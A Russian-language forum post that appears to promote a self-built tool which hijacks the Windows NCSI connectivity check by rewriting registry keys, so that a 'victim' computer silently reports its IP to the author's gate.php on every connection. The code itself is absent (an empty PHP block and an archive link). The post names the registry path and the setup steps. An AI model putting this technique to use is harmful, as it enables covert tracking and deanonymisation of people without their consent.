Не троян ( админам)
Писал для себя(мы все под колпаком Microsoft )
Отправка IP на гейт
Вообщем суть проги такая:
Начиная с Vista,Windows 7 существует функция (Network Connectivity Status Indicator (NCSI)) проверки
выхода в интернет.
Сообщение от
None
После подключения к сети операционная система пытается открыть файл http://www.msftncsi.com/ncsi.txt
Это обычный текстовый файл, содержащий строку Microsoft NCSI. Ожидаемый ответ от сервера — заголовок 200 ОК и эта строка.
Второй шаг — проверка работоспособоности DNS. Для этого NCSI пытается определить IP-адрес хоста dns.msftncsi.com. Ожидаемое значение — 131.107.255.255.
Варианты дальнейшего развития событий здесь таковы: Если оба шага успешно завершены — система рапортует о наличии соединения с Интернет.
Если файл ncsi.txt недоступен, а dns.msftncsi.com разрешается с другим адресом, либо его IP невозможно установить, - система сообщает о недоступности подключения к Интернет.
Если файл ncsi.txt недоступен, но dns.msftncsi.com разрешается корректно — система уведомляет пользователя возможной необходимости аутентификации посредством браузера.
(источник: h_ttp://winreview.ru/kakim-obrazom-windows-opredelyaet-nalichie-vyxoda-v-internet/)
так почему бы ее не использовать в своих целях.
на сервак (сайт) заливаем gate.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
1. вписываем ip сервака
2. адрес сайта
3. путь до гейта (dir/gate.php)
собираем получаем .ехе
прога прописывает это все в реестр:
Сообщение от
None
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\NlaSvc\Parameters\Internet
при выходе в интернет жертва не открывая браузеров подключается к нашему гейту где и оставляет свой айпишник. (gate.php можно дополнить на свое усмотрение)
ссылка:
тут
исходник в архиве
Мне кажется если отключить Яву в браузере то айпи не вычислить это плюс конечно, но тогда некоторые шеллы не работают , это минус